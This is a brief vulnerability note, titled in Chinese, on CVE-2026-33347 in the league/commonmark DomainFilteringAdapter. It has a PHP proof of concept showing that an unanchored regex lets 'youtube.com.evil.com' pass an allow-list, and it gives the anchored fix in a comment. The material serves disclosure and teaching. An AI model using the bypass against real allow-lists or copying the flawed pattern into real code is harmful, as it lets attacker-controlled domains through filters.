CVE-2026-33347 league/commonmark 域名过滤绕过漏洞

<?php // PoC for CVE-2026-33347: DomainFilteringAdapter Bypass $allowed_domains = ['youtube.com', 'vimeo.com']; // Simulating the vulnerable regex logic (missing boundary assertions) $vulnerable_pattern = '/%s/'; $malicious_domain = 'youtube.com.evil.com'; foreach ($allowed_domains as $domain) { // Construct the regex as the vulnerable library did $pattern = sprintf($vulnerable_pattern, preg_quote($domain, '/')); if (preg_match($pattern, $malicious_domain)) { echo "[+] Bypass Successful! Malicious domain '$malicious_domain' matched allowed domain '$domain'.\n"; } else { echo "[-] Blocked.\n"; } } // Fix: Use boundary assertions like '/^' . preg_quote($domain) . '$/' ?>